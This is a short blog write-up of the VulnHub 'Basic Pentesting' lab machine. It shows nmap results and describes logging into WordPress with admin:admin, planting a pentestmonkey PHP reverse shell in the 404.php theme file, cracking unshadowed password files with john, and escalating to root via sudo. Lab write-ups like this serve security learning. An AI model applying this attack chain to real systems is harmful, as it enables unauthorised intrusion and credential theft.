Open in app

Sign in

Write

Sign in

Basic-Pentesting{VulnHub}

Gladi_47
3 min readMay 13, 2023

--

Site = VULNHUB
Creator = Josiah Pierce
Diff = 🍕

Basic Summary:
Fairly basic machine nothing too complicated.On port scanning theres 3 ports ftp,ssh and http.Visiting the web, we’re presented with a wordpress site. Trying to login with default credentials we succeeded in that.And then, using the 404.php template in wordpress easily got a shell in the system.Then, we have a user MARLINSPIKE and we have permissions to read shadow and passwd file.Then by unshadowing the both files we gave it to john and got the password. Then got in to the user account using ssh.And we have sudo soooo,.. we are root…

##Quick Link

  1. Recon
  2. Web
  3. Initial Access
  4. BruteForce
  5. MarlinSpike
  6. R00T

##RECON

21/tcp open  ftp     ProFTPD 1.3.3c
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d60190392d8f46fb038673b33c547e54 (RSA)
|   256 f1f3c0ddbaa485f7139ada3abb4d9304 (ECDSA)
|_  256 12e298d2a3e7364fbe6bce366b7e0d9e (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:94:1B:57 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

##WEB

and yeh if the page doesnt load css just add the IP to /etc/hosts file.Its a wordpress page.Lets loginnnn!!! trying basic credentials.

They work admin:admin.WELL we’re in.

Theres nothing, Lets try to get a revershell using the themes.By using a php revershell in the 404.php file.


https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

##Initial Access

Nothing really interesting except that proftpd 1.3.3c is running.But I wanna do it without that sooo,, Lets check for files we have permissions for.

Well let’s unshadow these and try to bruteforce them.Its a machine afterall how hard can it be.

##Bruteforcing the shadow and passwd file

Not at all it turns out as username is the password.

##SSH as MarlinSpike

Checking to priv esc.

##R00T

Boom Done!!!!

Thanks for reading folks
Happy Hacking 😈 👏

Always eager to get suggestions for improvements.!!!

Vulnhub
Vulnhub Writeup
Basic Pentesting
Basic Pentesting Writeup
Boot2root

--

--

Gladi_47

Written by Gladi_47

7 Followers

N0t 3ven Close!

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams